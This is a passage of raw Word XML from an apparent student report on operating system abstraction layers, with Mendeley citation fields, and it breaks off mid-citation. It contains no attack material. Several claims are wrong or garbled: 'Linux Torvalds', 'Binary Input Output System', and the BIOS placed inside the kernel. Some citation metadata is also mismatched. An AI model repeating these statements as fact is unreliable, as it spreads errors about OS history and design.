          <w:iCs/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.slideshare.net/anoochit/quick-guide-with-linux-command-line","abstract":"OS KERNAL SHELL IMAGE","accessed":{"date-parts":[["2019","5","1"]]},"author":[{"dropping-particle":"","family":"Slideshare","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"slideshare.net","id":"ITEM-1","issued":{"date-parts":[["2009"]]},"page":"1","title":"OS 3 Rings: Hardware, Kernal Shell","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=02df53b9-17c2-3381-b1e7-c2f9ac231f01"]}],"mendeley":{"formattedCitation":"[25]","plainTextFormattedCitation":"[25]","previouslyFormattedCitation":"[25]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>[25]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://kkslinuxinfo.wordpress.com/2015/12/02/concepts-of-kernal-shell/","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"WordPress","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"WordPress.com","id":"ITEM-1","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Concepts of Kernal &amp; Shell – Linux Information &amp; Scripting","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=bc26d39a-1c83-382c-8194-213637d9cb1f"]},{"id":"ITEM-2","itemData":{"ISBN":"9780470343432","PMID":"15340339","abstract":"Find an introduction to the architecture, concepts and algorithms of the Linux kernel in Professional Linux Kernel Architecture, a guide to the kernel sources and large number of connections among subsystems. Find an introduction to the relevant structures and functions exported by the kernel to userland, understand the theoretical and conceptual aspects of the Linux kernel and Unix derivatives, and gain a deeper understanding of the kernel. Learn how to reduce the vast amount of information contained in the kernel sources and obtain the skills necessary to understand the kernel sources.","author":[{"dropping-particle":"","family":"Mauerer","given":"Wolfgang","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"BOOK","id":"ITEM-2","issued":{"date-parts":[["2008"]]},"title":"Linux ® Kernel Architecture","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=6d77d43c-dab7-42b2-b0cc-1bb3876c3e61"]},{"id":"ITEM-3","itemData":{"DOI":"10.1227/01.neu.0000407873.87315.7d","ISBN":"9780735619173","ISSN":"1524-4040","PMID":"22051727","abstract":"See how the core components of the Windows operating system work behind the scenesguided by a team of internationally renowned internals experts. Fully updated for Windows Server 2008 and Windows Vista, this classic guide delivers key architectural insights on system design, debugging, performance, and supportalong with hands-on experiments to experience Windows internal behavior firsthand.Delve inside Windows architecture and internals: Understand how the core system and management mechanisms workfrom the object manager to services to the registry Explore internal system data structures using tools like the kernel debugger Grasp the scheduler's priority and CPU placement algorithms Go inside the Windows security model to see how it authorizes access to data Understand how Windows manages physical and virtual memory Tour the Windows networking stack from top to bottomincluding APIs, protocol drivers, and network adapter drivers Troubleshoot file-system access problems and system boot problems Learn how to analyze crashes","author":[{"dropping-particle":"","family":"Russinovich","given":"Mark E","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Solomon","given":"David a","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Context","id":"ITEM-3","issued":{"date-parts":[["2005"]]},"title":"Windows Internals","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=65021790-6fde-4e5e-92df-8aae645da918"]}],"mendeley":{"formattedCitation":"[26]–[28]","plainTextFormattedCitation":"[26]–[28]","previouslyFormattedCitation":"[26]–[28]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>[26]–[28]</w:t>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A07A5" w14:textId="77777777" w:rsidR="00E06FE7" w:rsidRDefault="00E06FE7" w:rsidP="00E06FE7">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="430C4015" wp14:editId="54155CFE">
            <wp:extent cx="4848860" cy="3392805"/>
            <wp:effectExtent l="19050" t="19050" r="27940" b="171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8860" cy="3392805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F90DBB2" w14:textId="05D39E28" w:rsidR="00E06FE7" w:rsidRPr="00C06169" w:rsidRDefault="00E06FE7" w:rsidP="00E06FE7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc40134067"/>
      <w:r w:rsidRPr="00C06169">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C06169">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C06169">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C06169">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E77759">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C06169">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C06169">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Operating System Layers of Abstraction</w:t>
      </w:r>
      <w:r w:rsidR="00C06169">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://kkslinuxinfo.wordpress.com/2015/12/02/concepts-of-kernal-shell/","accessed":{"date-parts":[["2020","5","11"]]},"author":[{"dropping-particle":"","family":"WordPress","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"WordPress.com","id":"ITEM-1","issued":{"date-parts":[["2020"]]},"page":"1-1","title":"Concepts of Kernal &amp; Shell – Linux Information &amp; Scripting","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=bc26d39a-1c83-382c-8194-213637d9cb1f"]}],"mendeley":{"formattedCitation":"[26]","plainTextFormattedCitation":"[26]","previouslyFormattedCitation":"[26]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[26]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidR="0005149A">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEEE5E3" w14:textId="481DECA7" w:rsidR="00E06FE7" w:rsidRPr="00C06169" w:rsidRDefault="0090297E" w:rsidP="00E06FE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Application </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t>The application layer within a computer system is top level of a system where high-level programming languages and</w:t>
      </w:r>
      <w:r w:rsidR="00C06169">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00006C19">
        <w:t>software</w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t xml:space="preserve"> applications reside</w:t>
      </w:r>
      <w:r w:rsidR="00C06169">
        <w:t xml:space="preserve"> at this layer of OS abstraction</w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t xml:space="preserve"> including a Graphical User Interface</w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:t xml:space="preserve"> (GUI)</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.2138/rmg.2005.58.22","ISBN":"ISBN 0-9755787-6-6","ISSN":"1529-6466","abstract":"A graphical user interface (GUI) is a graphical display in one or more windows containing controls, called components, that enable a user to perform interactive tasks. The user of the GUI does not have to create a script or type commands at the command line to accomplish the tasks. Unlike coding programs to accomplish tasks, the user of a GUI need not understand the details of how the tasks are performed. GUI","author":[{"dropping-particle":"","family":"MathWorks Inc.","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"MATLAB User Guide","id":"ITEM-1","issued":{"date-parts":[["2015"]]},"title":"Creating Graphical User Interfaces","type":"article-journal"},"uris":["http://www.mendeley.com/documents/?uuid=c7d0239d-caf1-473e-b3f6-86a98a5438d3"]}],"mendeley":{"formattedCitation":"[29]","plainTextFormattedCitation":"[29]","previouslyFormattedCitation":"[29]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[29]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10310D97" w14:textId="77777777" w:rsidR="00C06169" w:rsidRPr="00E06FE7" w:rsidRDefault="00C06169" w:rsidP="00C06169">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1F7E5B" w14:textId="55805A04" w:rsidR="00E06FE7" w:rsidRPr="00E06FE7" w:rsidRDefault="0090297E" w:rsidP="00E06FE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00E06FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B05820" w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00E06FE7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:t xml:space="preserve"> lightweight Command Line Interface (CLI)</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1016/b978-0-12-374856-0.00014-6","abstract":"Checkpoint command line reference","author":[{"dropping-particle":"","family":"Witten","given":"Ian H.","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Frank","given":"Eibe","non-dropping-particle":"","parse-names":false,"suffix":""},{"dropping-particle":"","family":"Hall","given":"Mark A.","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Data Mining: Practical Machine Learning Tools and Techniques","id":"ITEM-1","issued":{"date-parts":[["2011"]]},"title":"The Command-Line Interface","type":"chapter"},"uris":["http://www.mendeley.com/documents/?uuid=462e7b50-be63-4530-80b4-116c63529a48"]}],"mendeley":{"formattedCitation":"[30]","plainTextFormattedCitation":"[30]","previouslyFormattedCitation":"[30]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[30]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E06FE7">
        <w:t xml:space="preserve"> logical </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t xml:space="preserve"> layer of a computer system is utilsed to process data sent from the application layer and translate it into low level computer code to interface with the Kernel. </w:t>
      </w:r>
      <w:r w:rsidR="00C06169">
        <w:t>The terminal shell is located at this layer of OS abstraction such as; Microsoft; MS-DOS, CMD and Linux; Born Again Shell (BASH).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427FE613" w14:textId="77777777" w:rsidR="00E06FE7" w:rsidRPr="00E06FE7" w:rsidRDefault="00E06FE7" w:rsidP="00E06FE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BBF068" w14:textId="0D4C90A6" w:rsidR="00E06FE7" w:rsidRPr="00E06FE7" w:rsidRDefault="0090297E" w:rsidP="00E06FE7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E06FE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel – </w:t>
      </w:r>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t xml:space="preserve">The kernel is the logical core of the OS that translated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t>Input|Output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E06FE7" w:rsidRPr="00E06FE7">
        <w:t xml:space="preserve"> (I|O) instructions from the shell and translates them into machine code to interface directly with the underlying physical hardware. The more efficient the Kernel is within an OS the higher efficiency the OS provides.</w:t>
      </w:r>
      <w:r w:rsidR="00C06169">
        <w:t xml:space="preserve"> An example of </w:t>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:t>low-level</w:t>
      </w:r>
      <w:r w:rsidR="00C06169">
        <w:t xml:space="preserve"> utilities that operate within the </w:t>
      </w:r>
      <w:r w:rsidR="0005149A">
        <w:t>Kernel</w:t>
      </w:r>
      <w:r w:rsidR="00C06169">
        <w:t xml:space="preserve"> that interface directly with the hardware are the; Binary Input Output System (BIOS), Device Drivers etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D93E43" w14:textId="796EDE80" w:rsidR="00CA4048" w:rsidRDefault="00431E0E" w:rsidP="00431E0E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The most hardware efficient kernel available within todays OS</w:t>
      </w:r>
      <w:r w:rsidR="00A95E87">
        <w:t xml:space="preserve"> market</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the open source</w:t>
      </w:r>
      <w:r w:rsidR="00A95E87">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007F300A">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"DOI":"10.1093/combul/41.3.32","ISBN":"978-0595137657","ISSN":"1460-2377","PMID":"22451589","abstract":"My journey to learn and better understand Linux began over a decade ago, back in 1998. I had just installed my first Linux distribution and had quickly become intrigued with the whole concept and philosophy behind Linux. There are always many ways to accomplish a single task. The same can be said about Linux distributions. A great many have existed over the years. Some still exist, some have morphed into something else, yet others have been relegated to our memories. They all do things differently to suit the needs of their target audience. Because so many different ways to accomplish the same end goal exist, I began to realize I no longer had to be limited by any one implementation. Prior to discovering Linux, we simply put up with issues in other Operating Systems as you had no choice. It was what it was, whether you liked it or not. With Linux, the concept of choice began to emerge. If you didn't like something, you were free, even encouraged, to change it. I tried a number of distributions and could not decide on any one. They were great systems in their own right. It wasn't a matter of right and wrong anymore. It had become a matter of personal taste. With all that choice available, it became apparent that there would not be a single system that would be perfect for me. So I set out to create my own Linux system that would fully conform to my personal preferences. To truly make it my own system, I resolved to compile everything from source code instead of using pre-compiled binary packages. This “perfect” Linux system would have the strengths of various systems without their perceived weaknesses. At first, the idea was rather daunting. I remained committed to the idea that such a system could be built. After sorting through issues such as circular dependencies and compile-time errors, I finally built a custom-built Linux system. It was fully operational and perfectly usable like any of the other Linux systems out there at the time. But it was my own creation. It was very satisfying to have put together such a system yourself. The only thing better would have been to create each piece of software myself. This was the next best thing. As I shared my goals and experiences with other members of the Linux community, it became apparent that there was a sustained interest in these ideas. It quickly became plain that such custom-built Linux systems serve not only to meet user specific requirements, but also serve as an ideal learning opportunity for progra…","author":[{"dropping-particle":"","family":"Beekmans","given":"Gerard","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"Linux","id":"ITEM-1","issued":{"date-parts":[["2018"]]},"title":"Linux From Scratch","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=ed839feb-c728-422d-bc72-d4d8a214dfcc"]}],"mendeley":{"formattedCitation":"[31]","plainTextFormattedCitation":"[31]","previouslyFormattedCitation":"[31]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[31]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kernel</w:t>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="00DC05AB">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"ISBN":"9780470343432","PMID":"15340339","abstract":"Find an introduction to the architecture, concepts and algorithms of the Linux kernel in Professional Linux Kernel Architecture, a guide to the kernel sources and large number of connections among subsystems. Find an introduction to the relevant structures and functions exported by the kernel to userland, understand the theoretical and conceptual aspects of the Linux kernel and Unix derivatives, and gain a deeper understanding of the kernel. Learn how to reduce the vast amount of information contained in the kernel sources and obtain the skills necessary to understand the kernel sources.","author":[{"dropping-particle":"","family":"Mauerer","given":"Wolfgang","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"BOOK","id":"ITEM-1","issued":{"date-parts":[["2008"]]},"title":"Linux ® Kernel Architecture","type":"book"},"uris":["http://www.mendeley.com/documents/?uuid=6d77d43c-dab7-42b2-b0cc-1bb3876c3e61"]}],"mendeley":{"formattedCitation":"[27]","plainTextFormattedCitation":"[27]","previouslyFormattedCitation":"[27]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002A30A3" w:rsidRPr="002A30A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[27]</w:t>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00681F9D">
        <w:t>developed by Linux Torvalds in 1991</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"abstract":"We explore the hardware portability issues in Linux that were uncovered when porting the operating system to multiple CPU and bus architectures. We also discuss software interface portability issues, especially with regard to binary compatibility with other operating systems that can share the same hardware platform. The approach taken in Linux is described, with a few example architectures covered in some more detail.","author":[{"dropping-particle":"","family":"Torvalds","given":"Linus","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"University of Helsinki","id":"ITEM-1","issued":{"date-parts":[["1997"]]},"title":"Linux: a portable operating system","type":"thesis"},"uris":["http://www.mendeley.com/documents/?uuid=f138ab35-342c-46f0-89b2-847dc6ab587f"]}],"mendeley":{"formattedCitation":"[32]","plainTextFormattedCitation":"[32]","previouslyFormattedCitation":"[32]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[32]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00681F9D">
        <w:t xml:space="preserve"> to emulate the then </w:t>
      </w:r>
      <w:r w:rsidR="00A95E87">
        <w:t xml:space="preserve">very </w:t>
      </w:r>
      <w:r w:rsidR="00681F9D">
        <w:t xml:space="preserve">expensive but highly </w:t>
      </w:r>
      <w:r w:rsidR="00B965E4">
        <w:t>efficient</w:t>
      </w:r>
      <w:r w:rsidR="00681F9D">
        <w:t xml:space="preserve"> business server OS; Unix. Today Linux </w:t>
      </w:r>
      <w:r>
        <w:t>is available with</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> many customised shells called ‘distributions</w:t>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>’ such as; Red Hat Linux</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
        <w:instrText>ADDIN CSL_CITATION {"citationItems":[{"id":"ITEM-1","itemData":{"URL":"https://www.redhat.com/en/technologies/linux-platforms/enterprise-linux","abstract":"red hat linux OS","accessed":{"date-parts":[["2019","5","1"]]},"author":[{"dropping-particle":"","family":"Red-Hat","given":"","non-dropping-particle":"","parse-names":false,"suffix":""}],"container-title":"redhat.com","id":"ITEM-1","issued":{"date-parts":[["2019"]]},"page":"1","title":"Red Hat Enterprise Linux operating system","type":"webpage"},"uris":["http://www.mendeley.com/documents/?uuid=8a7b3cc8-2c04-3338-a98a-bd60283ee280"]}],"mendeley":{"formattedCitation":"[33]","plainTextFormattedCitation":"[33]","previouslyFormattedCitation":"[33]"},"properties":{"noteIndex":0},"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"}</w:instrText>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006562B6" w:rsidRPr="006562B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>[33]</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00CA4048">
        <w:t>, Ubuntu Linux</w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006562B6">
        <w:fldChar w:fldCharType="begin" w:fldLock="1"/>
      </w:r>
      <w:r w:rsidR="002A30A3">
